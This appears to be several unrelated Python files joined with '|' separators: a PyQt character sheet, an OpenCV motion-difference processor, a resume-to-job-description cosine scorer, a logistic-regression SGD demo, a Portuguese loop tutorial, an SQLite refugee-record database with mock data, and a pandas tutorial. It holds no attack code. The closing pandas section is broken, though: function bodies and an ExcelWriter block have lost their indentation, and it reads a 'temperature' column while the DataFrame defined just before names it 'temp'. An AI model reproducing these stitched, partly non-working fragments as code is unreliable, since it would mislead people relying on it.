        clf.setPointSize(20)
        self.window.setFont(clf)
        self.show()
        self.center()

    def center(self):
        """Move the window to the center of the available screen area."""
        qr = self.frameGeometry()
        cp = QDesktopWidget().availableGeometry().center()
        qr.moveCenter(cp)
        self.move(qr.topLeft())
if __name__ == '__main__':
    app = QApplication(sys.argv)
    # Ask for the character name; exec_() blocks until the dialog closes.
    first = characterSelect()
    app.exec_()
    Player = Character(str(first.name), path)
    # Level 0 presumably means a brand-new save: run the creation wizard first.
    if Player.getLevel() == 0:
        second = characterCreator(Player)
        app.exec_()
    sheet = CharacterSheet(Player)
    app.exec_()
    # Persist the character before exiting.
    Player.CLOSE()
    sys.exit()
import cv2, logging
import numpy as np
import pprint as pp
from Pipeline.Model.CamShot import CamShot
from Pipeline.Model.ProcessingResult import ProcessingResult
from Common.CommonHelper import CommonHelper
from Processors.Processor import Processor
from Pipeline.Model.PipelineShot import PipelineShot
class DiffCamShot:
    """Builds frame-difference masks between a shot and its neighbours and
    annotates the shot with the resulting contours and bounding boxes."""

    def __init__(self):
        self.log = logging.getLogger("PROC:DIFF")
        self.helper = CommonHelper()

    def Process(self, pShot: PipelineShot, others: list):
        """Compare pShot against two other shots; draw contours/boxes and
        record difference statistics in pShot.Metadata['DIFF'].

        BUG FIX: the `others` annotation was `[]` (a list instance, not a type).
        """
        pShot.Metadata["DIFF"] = {}
        mask1 = self.DiffMask(pShot, others[0])
        mask2 = self.DiffMask(pShot, others[1])
        # Mean mask: difference visible on either neighbour shot.
        maskMean = self.Merge(mask1, mask2, lambda x, y: x // 2 + y // 2)
        cntsMean = self.ContoursByMask(maskMean, pShot)
        self.DrawContours(pShot.Shot, cntsMean, color=(0, 180, 180))
        # Min mask: difference confirmed against BOTH neighbour shots.
        maskMin = self.Merge(mask1, mask2, lambda x, y: min(x, y))
        cntsMin = self.ContoursByMask(maskMin, pShot, 'Diff')
        self.DrawContours(pShot.Shot, cntsMin, thickness=2)
        self.DrawBoxes(pShot, cntsMin)

    def RemoveZones(self, image):
        """Blank out known-noise regions; mutates and returns `image`."""
        image[:22, :230] = 0  # remove timestamp overlay
        return image

    def ContoursByMask(self, mask, pShot, summaryName=''):
        """Return contours of `mask`, largest-area first; optionally record
        per-contour statistics under pShot.Metadata['DIFF'][summaryName]."""
        cnts, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
        cnts = sorted(cnts, key=cv2.contourArea, reverse=True)
        areas = [cv2.contourArea(c) for c in cnts]
        areasStr = [str(a) for a in areas]
        totalArea = sum(areas)
        if summaryName != '':
            pShot.Metadata['DIFF'][summaryName] = {
                'TotalArea': totalArea,
                'Areas': areas,
                'Count': len(cnts),
            }
        self.log.debug(f'{self.helper.Progress(totalArea, 2.5e4)} Contours {summaryName}: {len(cnts)}. Total contours area : {totalArea} ({", ".join(areasStr)})')
        return cnts

    def Merge(self, arr1, arr2, func):
        """Element-wise combination of two same-shape arrays with `func`.

        PERF FIX: replaces the original nested Python double loop over every
        pixel with a single np.frompyfunc pass; the produced values and the
        result dtype (arr1's) are unchanged.
        """
        return np.frompyfunc(func, 2, 1)(arr1, arr2).astype(arr1.dtype)

    def DrawContours(self, shot, contours, color=(0, 255, 255), thickness=1):
        """Draw all contours onto the shot image."""
        cv2.drawContours(shot.GetImage(), contours, -1, color, thickness)

    def DrawBoxes(self, pShot: PipelineShot, contours):
        """Draw bounding boxes for the three largest contours and record
        each box's shape and position in the shot metadata."""
        pShot.Metadata['DIFF']['boxes'] = []
        for c in contours[0:3]:
            area = int(cv2.contourArea(c))
            (x, y, w, h) = cv2.boundingRect(c)
            cv2.rectangle(pShot.Shot.GetImage(), (x, y), (x + w, y + h), (0, 255, 0), 1, 8)
            # Label each box with its area in hundreds of pixels.
            cv2.putText(pShot.Shot.GetImage(), str(area // 100), (x, y - 3), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2, cv2.LINE_AA)
            pShot.Metadata['DIFF']['boxes'].append({
                'profile_proportion': round(h / w, 2),
                'center': [x + w // 2, y + h // 2],
                'area': area
            })

    def DiffMask(self, pShot: PipelineShot, other: PipelineShot):
        """Binary motion mask between the two shots' grayscale originals.

        NOTE(review): RemoveZones mutates the arrays returned by GrayImage()
        in place -- confirm GrayImage returns a fresh copy.
        """
        image1 = self.RemoveZones(pShot.OriginalShot.GrayImage())
        image2 = self.RemoveZones(other.OriginalShot.GrayImage())
        absdiff = cv2.absdiff(image1, image2)
        gausian = cv2.GaussianBlur(absdiff, (5, 5), 0)  # suppress sensor noise
        _, thresh = cv2.threshold(gausian, 40, 255, cv2.THRESH_BINARY)
        # Dilate to merge nearby specks into solid blobs.
        dilate = cv2.dilate(thresh, np.ones((10, 10), np.uint8))
        return dilate
class DiffContoursProcessor(Processor):
    """Pipeline processor that annotates each shot with motion-difference
    contours computed against the other shots in the same batch."""

    def __init__(self):
        super().__init__("DIFF")

    def ProcessItem(self, pShot: PipelineShot, ctx: dict):
        # All other shots in this batch serve as comparison frames.
        others = ctx['items'].copy()
        others.remove(pShot)
        # NOTE(review): `others` is passed where the base class signature takes
        # a ctx dict -- confirm this is what Processor.ProcessItem expects.
        super().ProcessItem(pShot, others)
        diff = DiffCamShot()
        return diff.Process(pShot, others)
|
# coding: utf-8
# In[52]:
import sys,os
import numpy as np
import nltk as nt
import docx
from nltk.corpus import stopwords
import glob,os
import warnings
warnings.filterwarnings("ignore")
import pandas as pd
import glob,os, itertools
# In[53]:
import re, math
from collections import Counter
# Pre-compiled tokenizer: runs of word characters.
WORD = re.compile(r'\w+')


def get_cosine(vec1, vec2):
    """Cosine similarity between two sparse word-count vectors (mappings).

    Returns 0.0 when either vector has zero magnitude.
    """
    shared = set(vec1.keys()) & set(vec2.keys())
    dot = sum(vec1[w] * vec2[w] for w in shared)
    norm1 = math.sqrt(sum(c ** 2 for c in vec1.values()))
    norm2 = math.sqrt(sum(c ** 2 for c in vec2.values()))
    magnitude = norm1 * norm2
    if not magnitude:
        return 0.0
    return float(dot) / magnitude


def text_to_vector(text):
    """Tokenize `text` and return a Counter of word frequencies."""
    return Counter(WORD.findall(text))
# BUG FIX: text1/text2 were never defined, so this demo raised NameError.
# Define small sample texts so the example runs standalone.
text1 = "this is a foo bar sentence"
text2 = "this sentence is similar to a foo bar sentence"
vector1 = text_to_vector(text1)
vector2 = text_to_vector(text2)
cosine = get_cosine(vector1, vector2)
# In[54]:
# Read the Data Scientist job description and turn it into a term vector.
with open("Data_Scientist_JD.txt", "r") as f:
    Data_Science_JD = text_to_vector(f.read())
# Parallel lists: candidate name and their cosine-similarity score.
person = []
score = []
# Score every resume in the resumes/ directory against the JD.
for file in glob.glob('resumes\\*.txt'):
    # BUG FIX: the original used file.split('\\')[6], which only works for one
    # specific absolute-path depth; take the last path component instead.
    files = os.path.basename(file).split('.')[0]
    # Use a context manager so the file handle is always closed.
    with open(file, "r") as f1:
        resume = f1.read()
    # Guard against resumes that have no "Skills:" section (the original
    # raised IndexError on such files).
    parts = resume.split('Skills:')
    if len(parts) < 2:
        continue
    resume_skills = text_to_vector(parts[1])
    Data_Scientist = get_cosine(resume_skills, Data_Science_JD)
    person.append(files)
    score.append(Data_Scientist)
# In[55]:
# Assemble the per-candidate match table.
final_score = pd.DataFrame(
    {'Person': person,
     'Percentage_Match': score
     })
# Cosine similarity lies in [0, 1]; scale it to a percentage.
final_score['Percentage_Match'] = final_score['Percentage_Match'] * 100
final_score.to_csv('score.csv')
# NOTE(review): in the notebook these were bare display expressions; in a
# plain script they are no-ops, so print explicitly instead.
print(final_score)
print(os.getcwd())
# In[ ]:
|
#import the necessary packages
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from sklearn.datasets import make_blobs
import matplotlib.pyplot as plt
import numpy as np
def sigmoid_activation(x):
    """Logistic sigmoid: map any real-valued input into the interval (0, 1)."""
    return np.reciprocal(1.0 + np.exp(-x))
def predict(X, W):
    """Return hard 0/1 class predictions for inputs X under weights W.

    BUG FIX: the original thresholded the raw dot products X.dot(W) at 0.5,
    even though the comment describes a step function on the (sigmoid)
    output -- that silently shifts the decision boundary away from 0.
    Scores are now passed through the sigmoid first, so 0.5 is a genuine
    probability threshold.
    """
    preds = sigmoid_activation(X.dot(W))
    # Binary classifier: step function at probability 0.5.
    preds[preds <= 0.5] = 0
    preds[preds > 0.5] = 1
    return preds
#Generator to get data from the X and Y elements
def next_batch(X, y, batchSize):
    """Yield successive (features, labels) mini-batches of size *batchSize*.

    The final batch may be smaller when the row count is not a multiple of
    the batch size.
    """
    for start in range(0, X.shape[0], batchSize):
        stop = start + batchSize
        yield (X[start:stop], y[start:stop])
# Generate a 2-class classification problem with 1000 data points,
# where each data point is a 2D feature vector.
(X, y) = make_blobs(n_samples=1000, n_features=2, centers=2, cluster_std=1.5, random_state=1)
# Reshape labels into a column vector so they align with the predictions.
y = y.reshape((y.shape[0], 1))
# Bias trick: prepend a column of 1's so the bias is learned as part of W.
X = np.c_[np.ones(X.shape[0]), X]
# Split the data 50/50 into train and test partitions.
(trainX, testX, trainY, testY) = train_test_split( X, y, test_size = 0.5, random_state=42)
print("[INFO] training...")
# Initialize the weight matrix randomly and keep per-epoch losses for plotting.
W = np.random.randn(X.shape[1], 1)
losses = []
epochs = 100
batch_size = 32
alpha = 0.001  # learning rate
# Learn via mini-batch stochastic gradient descent.
for epoch in range(epochs):
    epochLoss = []
    for(batchX, batchY) in next_batch(trainX, trainY, batch_size):
        # Forward pass: sigmoid of the batch scores.
        preds = sigmoid_activation(batchX.dot(W))
        # Error between predictions and true labels.
        errors = preds - batchY
        # Track the sum-of-squares loss for this batch.
        epochLoss.append(np.sum(errors**2))
        # Gradient of the squared error w.r.t. W (constant factor absorbed
        # by the learning rate), then one descent step.
        gradient = batchX.T.dot(errors)
        W = W - (alpha * gradient)
    # Average the loss over all the batches in an epoch.
    loss = np.average(epochLoss)
    losses.append(loss)
    # Report progress on the first epoch and every 5th epoch thereafter.
    if epoch ==0 or (epoch+1)%5==0:
        print("[INFO] epoch = {}, loss = {:.7f}".format(int(epoch+1), loss))
# Evaluate the model on the held-out test split.
print("[INFO] evaluating...")
preds = predict(testX, W)
print(classification_report(testY, preds))
# Plot the testing classification data (columns 1 and 2; column 0 is the bias).
plt.style.use("ggplot")
plt.figure()
plt.title("Data")
plt.scatter(testX[:, 1], testX[:, 2], marker = "o",c = testY[:,0], s = 30)
# Plot the loss over time.
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, epochs), losses)
plt.title("Training Loss")
plt.xlabel("Epoch #")
plt.ylabel("Loss")
plt.show()
# Simple loop: counts 1..10, printing each value followed by an arrow.
cont = 1
while cont <= 10:
    print(cont, "-->", end="")
    cont += 1
print("FIM")
# Infinite loop: only stops manually or with a break command.
# NOTE(review): as written this never terminates, so the code below it is
# unreachable -- it is a deliberate tutorial demo.
cont = 1
while True:
    print(cont, "-->", end="")
    cont += 1
print("FIM")
# Reads numbers until the sentinel value 999 is entered.
n = 0
while n != 999:
    n = int(input("Digite um número"))
# Summing version -- note it (incorrectly) adds the 999 sentinel to the sum.
n = s = 0
while n != 999:
    n = int(input("Digite um número"))
    s += n
print("A soma vale {}".format(s))
# Correct way to exclude the 999 sentinel from the sum:
# break out of the loop before adding it.
n = s = 0
while True:
    n = int(input("Digite um número"))
    if n == 999:
        break
    s += n
print("A soma vale {}".format(s))
# Printing with f-strings.
print(f"A soma vale {s}")
nome = "Jose"
idade = 33
salario = 987.35
print(f"O {nome} tem {idade} anos")
# :.2f formats the salary with two decimal places.
print(f"O {nome} tem {idade} anos e ganha R$ {salario:.2f}")
|
import sqlite3
import os
import sys
import csv
import refugee
DATABASE_CON = os.path.join(os.getcwd(),"pythonsqlite.db")
def create_connection(db_file):
    """ create a database connection to the SQLite database
        specified by db_file
    :param db_file: database file
    :return: Connection object or None
    """
    try:
        conn = sqlite3.connect(db_file)
        return conn
    except sqlite3.Error as e:
        # BUG FIX: the original caught bare `Error`, an undefined name, which
        # would itself raise NameError whenever sqlite3.connect failed.
        print(e)
    return None
def create_table(conn, create_table_sql):
    """ create a table from the create_table_sql statement
    :param conn: Connection object
    :param create_table_sql: a CREATE TABLE statement
    :return: None (errors are printed, not raised)
    """
    try:
        c = conn.cursor()
        c.execute(create_table_sql)
    except sqlite3.Error as e:
        # BUG FIX: the original caught bare `Error`, an undefined name, which
        # would raise NameError instead of reporting the SQL problem.
        print(e)
def create_tables(database):
    """Create the refugee-tracking schema in *database* if it is missing.

    Tables: Person, Origin_Address, Camp_Locations, plus the Person_Origin
    and Person_Camp link tables that tie a person to an address and a camp.

    :param database: path to the SQLite database file
    """
    create_person_table = """ CREATE TABLE IF NOT EXISTS Person (
                            person_id integer PRIMARY KEY,
                            name text NOT NULL,
                            date_of_birth text NOT NULL,
                            marital_status text NOT NULL,
                            citizenship text NOT NULL,
                            education text NOT NULL,
                            occupation text NOT NULL,
                            religion text NOT NULL,
                            ethnic_origin text NOT NULL,
                            date_of_arrival text NOT NULL
                        ); """
    create_origin_address_table = """CREATE TABLE IF NOT EXISTS Origin_Address (
                            addr_id integer PRIMARY KEY,
                            address text NOT NULL,
                            region text NOT NULL,
                            city text NOT NULL,
                            postal_code text NOT NULL,
                            country text NOT NULL
                        );"""
    create_camp_locations_table = """CREATE TABLE IF NOT EXISTS Camp_Locations (
                            camp_id integer PRIMARY KEY,
                            shelter_number text NOT NULL,
                            block text NOT NULL,
                            section text NOT NULL
                        );"""
    create_person_origin_table = """CREATE TABLE IF NOT EXISTS Person_Origin (
                            unique_id integer PRIMARY KEY,
                            person_id integer NOT NULL,
                            addr_id integer NOT NULL,
                            FOREIGN KEY (person_id) REFERENCES Person(person_id),
                            FOREIGN KEY (addr_id) REFERENCES Origin_Address(addr_id)
                        );"""
    create_person_camp_table = """CREATE TABLE IF NOT EXISTS Person_Camp (
                            unique_id integer PRIMARY KEY,
                            person_id integer NOT NULL,
                            camp_id integer NOT NULL,
                            FOREIGN KEY (person_id) REFERENCES Person(person_id),
                            FOREIGN KEY (camp_id) REFERENCES Camp_Locations(camp_id)
                        );"""
    # create a database connection
    conn = create_connection(database)
    if conn is None:
        # BUG FIX: the original fell through to conn.commit()/conn.close()
        # even when the connection failed, raising AttributeError on None.
        print("Error! cannot create the database connection.")
        return
    try:
        create_table(conn, create_person_table)
        create_table(conn, create_origin_address_table)
        create_table(conn, create_camp_locations_table)
        create_table(conn, create_person_origin_table)
        create_table(conn, create_person_camp_table)
        conn.commit()
    finally:
        # Close the connection even if a table creation raises.
        conn.close()
def refugee_db_insertion(prsn, database):
    """Insert one person plus their origin address and camp location.

    Inserts one row each into Person, Origin_Address and Camp_Locations,
    then links them through Person_Origin and Person_Camp using the
    auto-generated rowids of the three inserts.

    :param prsn: refugee.Person object with place_of_origin / camp_location set
    :param database: path to the SQLite database file
    """
    # Collects the lastrowid of each insert for the link-table rows below.
    keys = dict()
    conn = create_connection(database)
    # Debug trace of the record being inserted.
    print(repr(prsn))
    if not conn:
        sys.exit('Error, cannot create db connection')
    cur = conn.cursor()
    cur.execute("""INSERT INTO Person (name,
                                       date_of_birth,
                                       marital_status,
                                       citizenship,
                                       education,
                                       occupation,
                                       religion,
                                       ethnic_origin,
                                       date_of_arrival) VALUES (?,?,?,?,?,?,?,?,?);""", (prsn.name,
                                       prsn.date_of_birth,
                                       prsn.marital_status,
                                       prsn.citizenship,
                                       prsn.education,
                                       prsn.occupation,
                                       prsn.religion,
                                       prsn.ethnic_origin,
                                       prsn.date_of_arrival))
    keys['person_id'] = cur.lastrowid
    # Column names are listed explicitly, so the city/region order differing
    # from the CREATE TABLE declaration order is harmless.
    cur.execute("""INSERT INTO Origin_Address (address,
                                               city,
                                               region,
                                               postal_code,
                                               country) VALUES (?,?,?,?,?);""", (prsn.place_of_origin.address1,
                                               prsn.place_of_origin.city,
                                               prsn.place_of_origin.region,
                                               prsn.place_of_origin.postal_code,
                                               prsn.place_of_origin.country))
    keys['addr_id'] = cur.lastrowid
    cur.execute("""INSERT INTO Camp_Locations (shelter_number,
                                               block,
                                               section) VALUES (?,?,?);""", (prsn.camp_location.shelter_number,
                                               prsn.camp_location.block,
                                               prsn.camp_location.section))
    keys['camp_id'] = cur.lastrowid
    # Link tables tie the person to their address and camp rows.
    cur.execute("""INSERT INTO Person_Origin (person_id,
                                              addr_id) VALUES (?,?);""", (keys['person_id'],keys['addr_id']))
    cur.execute("""INSERT INTO Person_Camp (person_id,
                                            camp_id) VALUES (?,?);""", (keys['person_id'],keys['camp_id']))
    conn.commit()
    conn.close()
def refugee_db_update(prsn, database):
    """Update an existing person's Person, Origin_Address and Camp rows.

    The person row is located by prsn.file_number (used as person_id); the
    linked address/camp rows are found through the Person_Origin and
    Person_Camp join tables and updated in place.

    :param prsn: refugee.Person object carrying the new values
    :param database: path to the SQLite database file
    """
    conn = create_connection(database)
    if not conn:
        sys.exit('Error, cannot create db connection')
    cur = conn.cursor()
    cur.execute("""UPDATE Person
                   SET name=?,
                       date_of_birth=?,
                       marital_status=?,
                       citizenship=?,
                       education=?,
                       occupation=?,
                       religion=?,
                       ethnic_origin=?,
                       date_of_arrival=?
                   WHERE person_id=?;""", (prsn.name,
                       prsn.date_of_birth,
                       prsn.marital_status,
                       prsn.citizenship,
                       prsn.education,
                       prsn.occupation,
                       prsn.religion,
                       prsn.ethnic_origin,
                       prsn.date_of_arrival,
                       prsn.file_number))
    # Resolve the address row linked to this person.
    addr_id = cur.execute("""SELECT po.addr_id
                             FROM Person p
                             INNER JOIN Person_Origin po on po.person_id = p.person_id
                             WHERE p.person_id=?;""", (prsn.file_number,))
    addr_id = list(addr_id)
    # Assumes exactly one linked address row exists -- TODO confirm.
    addr_id = addr_id[0][0]
    # Debug output.
    print(type(addr_id), addr_id)
    cur.execute("""UPDATE Origin_Address
                   SET address=?,
                       city=?,
                       region=?,
                       postal_code=?,
                       country=?
                   WHERE addr_id=?;""", (prsn.place_of_origin.address1,
                       prsn.place_of_origin.city,
                       prsn.place_of_origin.region,
                       prsn.place_of_origin.postal_code,
                       prsn.place_of_origin.country,
                       addr_id))
    # Resolve the camp row linked to this person.
    camp_id = cur.execute("""SELECT pc.camp_id
                             FROM Person p
                             INNER JOIN Person_Camp pc on pc.person_id = p.person_id
                             WHERE p.person_id=?;""", (prsn.file_number,))
    camp_id = list(camp_id)[0][0]
    cur.execute("""UPDATE Camp_Locations
                   SET shelter_number=?,
                       block=?,
                       section=?
                   WHERE camp_id=?;""", (prsn.camp_location.shelter_number,
                       prsn.camp_location.block,
                       prsn.camp_location.section,
                       camp_id))
    conn.commit()
    conn.close()
def refugee_db_selection(person_id, database):
    """Load one person (with address and camp) and rebuild a refugee.Person.

    :param person_id: primary key of the Person row to fetch
    :param database: path to the SQLite database file
    :return: a populated refugee.Person object
    :raises Exception: when the join does not yield exactly one row
    """
    conn = create_connection(database)
    if not conn:
        sys.exit('Error, cannot create db connection')
    cur = conn.cursor()
    result = cur.execute("""SELECT p.person_id, p.name, p.date_of_birth, p.marital_status,
                            p.citizenship, p.education, p.occupation, p.religion, p.ethnic_origin,
                            p.date_of_arrival,
                            oa.address, oa.city, oa.region, oa.postal_code, oa.country,
                            cl.shelter_number, cl.block, cl.section
                            FROM Person p
                            INNER JOIN Person_Origin po ON po.person_id = p.person_id
                            INNER JOIN Origin_Address oa ON oa.addr_id = po.addr_id
                            INNER JOIN Person_Camp pc ON pc.person_id = p.person_id
                            INNER JOIN Camp_Locations cl ON cl.camp_id = pc.camp_id
                            WHERE p.person_id=?;""", (person_id,))
    result = list(result)
    if len(result) != 1:
        raise Exception("Database selection returned invalid number of results")
    result = result[0]
    # Columns 0-9 feed the Person constructor; 10-14 the address; 15-17 the camp.
    newP = refugee.Person(*result[:10])
    # The '' placeholder is presumably a second address line -- TODO confirm
    # against refugee.Person.setPlaceOfOrigin.
    newP.setPlaceOfOrigin(result[10], '', *result[11:15])
    newP.setCampLocation(*result[15:])
    conn.close()
    return newP
def refugee_db_get_id_from_name(name, database):
    """Return the person_id of the first Person whose name matches exactly.

    :raises Exception: when no row matches *name*
    """
    conn = create_connection(database)
    if not conn:
        sys.exit('Error, cannot create db connection')
    cur = conn.cursor()
    rows = list(cur.execute("""SELECT person_id
                               FROM Person
                               WHERE name=?;""", (name,)))
    if len(rows) < 1:
        raise Exception("Database selection returned invalid number of results")
    conn.close()
    return rows[0][0]
def refugee_db_search_by_name(name, database):
    """Return all joined person/address/camp rows whose Person.name matches.

    BUG FIX: the original built the result list and closed the connection
    but never returned anything, so callers always received None.

    :param name: exact name to match against Person.name
    :param database: path to the SQLite database file
    :return: list of joined row tuples (possibly empty)
    """
    conn = create_connection(database)
    if not conn:
        sys.exit('Error, cannot create db connection')
    cur = conn.cursor()
    result = cur.execute("""SELECT p.person_id, p.name, p.date_of_birth, p.marital_status,
                            p.citizenship, p.education, p.occupation, p.religion, p.ethnic_origin,
                            p.date_of_arrival,
                            oa.address, oa.city, oa.region, oa.postal_code, oa.country,
                            cl.shelter_number, cl.block, cl.section
                            FROM Person p
                            INNER JOIN Person_Origin po ON po.person_id = p.person_id
                            INNER JOIN Origin_Address oa ON oa.addr_id = po.addr_id
                            INNER JOIN Person_Camp pc ON pc.person_id = p.person_id
                            INNER JOIN Camp_Locations cl ON cl.camp_id = pc.camp_id
                            WHERE p.name=?;""", (name,))
    result = list(result)
    conn.close()
    return result
def execute_test_join(database):
    """Smoke-test the schema: print the person/camp join and raw table dumps."""
    conn = create_connection(database)
    if not conn:
        sys.exit('Error, cannot create db connection')
    cur = conn.cursor()
    joined = cur.execute("""SELECT * FROM Person p
                            INNER JOIN Person_Camp pc
                            ON p.person_id = pc.person_id
                            INNER JOIN Camp_Locations cl
                            ON pc.camp_id = cl.camp_id""").fetchall()
    print(joined)
    # Dump each table so its raw contents can be eyeballed.
    for table_name in ("Person_Camp", "Camp_Locations", "Person"):
        print(cur.execute("SELECT * FROM {}".format(table_name)).fetchall())
    conn.close()
def fill_db_with_mock_data(file, database_con):
    """Load mock people from a CSV file and insert each into the database.

    The CSV header names are routed to one of three attribute groups
    (person, origin address, camp location); an unknown column aborts the
    program.

    :param file: path to the CSV file (header row required)
    :param database_con: path to the SQLite database file
    """
    # Column-name groups used to dispatch each CSV cell.
    person_attributes = set(('name', 'date_of_birth', 'marital_status', 'citizenship',
                             'education', 'occupation', 'religion', 'ethnic_origin', 'date_of_arrival'))
    place_of_orig_attrs = set(('address1', 'city', 'region', 'postal_code', 'country'))
    camp_loc_attrs = set(('shelter_number', 'block', 'section'))
    # use context manager to open csv data
    with open(file) as csvfile:
        fo = csv.reader(csvfile, delimiter=',')
        # First row is the header: it defines the column-to-attribute mapping.
        column_names = next(fo)
        for row in fo:
            person_dict = dict()
            place_orig_dict = dict()
            camp_loc_dict = dict()
            # Pair each header name with the cell value and route it.
            for i in zip(column_names, row):
                if i[0] in person_attributes:
                    person_dict[i[0]] = i[1]
                elif i[0] in place_of_orig_attrs:
                    place_orig_dict[i[0]] = i[1]
                elif i[0] in camp_loc_attrs:
                    camp_loc_dict[i[0]] = i[1]
                else:
                    sys.exit('invalid value found in csv column header: {}'.format(i[0]))
            # Build the nested objects, then the person, and persist it.
            person_dict['place_of_origin'] = refugee.Address(**place_orig_dict)
            person_dict['camp_location'] = refugee.CampLocation(**camp_loc_dict)
            person = refugee.Person(**person_dict)
            refugee_db_insertion(person, database_con)
if __name__ == '__main__':
    # NOTE(review): this demo `person` is constructed but never inserted or
    # otherwise used -- the database is populated from MOCK_DATA.csv below.
    person = refugee.Person('John M Doe', '2010-10-20', 'married', 'American',
                            'High School', 'Mason', 'Agnostic', 'White',
                            '2017-11-16')
    person.setPlaceOfOrigin('123 Pleasant St', '', 'Sharpsburg',
                            'MD', '12345', 'US')
    person.setCampLocation('23F', 'D', '4')
    # Create the schema, load the mock rows, and print the join smoke-test.
    create_tables(DATABASE_CON)
    fill_db_with_mock_data('MOCK_DATA.csv', DATABASE_CON)
    execute_test_join(DATABASE_CON)
|
#CREATING DATAFRAME
import pandas as pd
weather_stuff = {
'day':['1/1/2017', '1/2/2017', '1/3/2017', '1/4/2017', '1/5/2017', '1/6/2017'],
'temp':[23, 34, 25, 34, 33, 12],
'windspeed':[0, 7, 24, 3, 6, 9],
'event':['rainy', 'sunny', 'snow', 'snow', 'rainy', 'sunny']
}
df = pd.DataFrame(weather_stuff)
print(df)
#CREATING DATAFRAME
import pandas as pd
df = pd.read_csv('weather_stuff.csv')
print(df)
rows, columns = df.shape #GIVES THE SIZE
print(rows)
print(columns)
print(df.head(2)) #PRINTS TOP 2 ROWS
print(df.tail()) #PRINTS THE LAST 5 ROWS
print(df[2:5]) #PRINTS THE ROWS BETWEEN 2 AND 5
print(df.columns) #PRINTS NAME OF COLUMNS
print(df.day) #series #ONLY PRINTS DAY COLUMN
print(type(df.day)) #PRINTS #Series
print(type(df)) #PRINTS #Dataframe
print(df[['event', 'day']]) #two columns at a time
print(df['temperature'].max()) #finds max of temperature from all
print(df['temperature'].min()) #finds min of temperature from all
print(df['temperature'].mean()) #finds mean of temperature
print(df['temperature'].std()) #finds standard deviation of temperature
print(df.describe()) #gives the statistics of the integer
print(df[df.temperature >= 32]) #temperature above or 32
print(df['day'][df['temperature'] == df['temperature'].max()]) #print day for max temperature
print(df[['day', 'temperature']][df['temperature'] == df['temperature'].max()]) #prints day and temperature for max temperature
print(df.index)
print(df.set_index('day', inplace = True))
# In-place operation is an operation that changes directly the content of a given linear algebra, vector, matrices (Tensor) without making a copy.
# An operator that performs such an operation is called an in-place operator.
df.set_index('day', inplace = True)
print(df.loc['1/2/2017'])
df.reset_index(inplace = True)
print(df)
df.set_index('event', inplace = True)
print(df.loc['Snow'])
df.reset_index(inplace = True)
print(df)
## Diff ways of Creating Dataframe
import pandas as pd
#Csv
df = pd.read_csv('__.csv')
#Excel
df1 = pd.read_excel('___.xlsx', 'Sheet1')
#Creating dataframe from a dictionary
n = {
'ds':[3, 4, 5],
'sef':['ffs', 'wfw', 'efe']
}
df2 = pd.DataFrame(n)
print(df2)
#Creating dataframe from a tuples list - list contains tuples
x = [
('1/1/2017', 32, 6, 'Rain'),
('1/2/2017', 22, 16, 'sunny'),
('1/3/2017', 12, 26, 'Rain')
]
df3 = pd.DataFrame(x, columns = ['day', 'temp', 'windspeed', 'event'])
print(df3)
#List of dictionaries
a = [
{'day':'1/1/2017', 'temp':23, 'windspeed':7, 'event':'Rainy'},
{'day':'1/2/2017', 'temp':43, 'windspeed':17, 'event':'Sunny'},
{'day':'1/3/2017', 'temp':33, 'windspeed':3, 'event':'Rainy'}
]
df4 = pd.DataFrame(a)
print(df4)
#Other Types - Google for other Types.
# READ CSV AND WRITE CSV
import pandas as pd
df = pd.read_csv('work_doc.csv')
df1 = pd.read_csv('work_doc.csv', skiprows = 1)
df2 = pd.read_csv('work_doc.csv', header = 1)
df3 = pd.read_csv('work_doc.csv', header=None)
df4 = pd.read_csv('work_doc.csv', header=None, names=['ticker','eps','revenue','price','people'])
df5 = pd.read_csv('work_doc.csv', nrows = 3)
df6 = pd.read_csv('work_doc.csv', na_values = {
'Eps':['NOT AVAILABLE', 'n.a.'],
'Revenue':['NOT AVAILABLE', 'n.a.', -1],
'Price':['NOT AVAILABLE', 'n.a.'],
'People':['NOT AVAILABLE', 'n.a.']
})
print(df)
print(df1)
print(df2)
print(df3)
print(df4)
print(df5)
print(df6)
print(df6.to_csv('new.csv', index=False, header = False, columns=['Tickers', 'Eps']))
#READ EXCEL AND WRITE EXCEL - xlrd, openpyxl
import pandas as pd
def convert_people_cell(cell):
if cell == 'n.a.':
return 'sam walton'
return cell
def convert_eps_cell(cell):
if cell == 'NOT AVAILABLE':
return None
return cell
df9 = pd.read_excel('stock_data.xlsx', 'Sheet1', converters={
'People': convert_people_cell,
'Eps':convert_eps_cell
})
print(df9)
print(df9.to_excel('new.xlsx', sheet_name = 'Stocks'))
print(df9.to_excel('new.xlsx', sheet_name = 'Stocks', startrow = 2, startcol = 2, index = False))
df_stocks = pd.DataFrame({
'tickers':['GOOGL', 'WMT', 'MSFT'],
'eps':[845, 65, 64],
'price':[30.37, 14.26, 30.97],
'people':[27.82, 4.61, 2.21]
})
df_weather = pd.DataFrame({
'day':['1/1/2017', '1/5/2017', '1/6/2017'],
'temp':[23, 34, 252],
'event':['rainy', 'sunny', 'snow']
})
with pd.ExcelWriter('stocks_weather.xlsx') as writer:
df_stocks.to_excel(writer, sheet_name='stocks')
df_weather.to_excel(writer, sheet_name = 'weather')
#Handle Missing Data
import pandas as pd
df = pd.read_csv('newyork.csv', parse_dates=['Day'])
print(df)
print(type(df.Day[0]))
df.set_index('Day', inplace=True)
print(df)
#Fill Na
x = df.fillna(0)
x = df.fillna({
'Temp':0,
'Windspeed':0,
'Event':'No Event'
})
x = df.fillna(method='ffill') #Carry forward previous days values.
x = df.fillna(method='bfill') #Carry forward next days values.
x = df.fillna(method='bfill', axis='columns') #Axis fill = Horizontal fill
x = df.fillna(method='ffill', limit=1)
print(x)
#Interpolate
y = df.interpolate(method='time') #method = time works only when index set to date time series
print(y)
#Drop Na
z = df.dropna()
z = df.dropna(how='all') # all column values na in a row
z = df.dropna(thresh=1) #atleast one column value in a row
z = df.dropna(thresh=2) #atleast two column value in a row
print(z)
dt = pd.date_range('01/01/2017', '01/11/2017') # Missing Dates
idx = pd.DatetimeIndex(dt)
print(df.reindex(idx))
# Missing data part 2
import pandas as pd
import numpy as np
df = pd.read_csv('dates.csv')
print(df)
new_df = df.replace([-99999, -88888],np.NaN)
new_df = df.replace({
'Temp':-99999,
'Windspeed':-99999,
'Event': 'No Event'
},np.NaN)
new_df = df.replace({
-99999: np.NaN,
'No Event': 'Sunny'
})
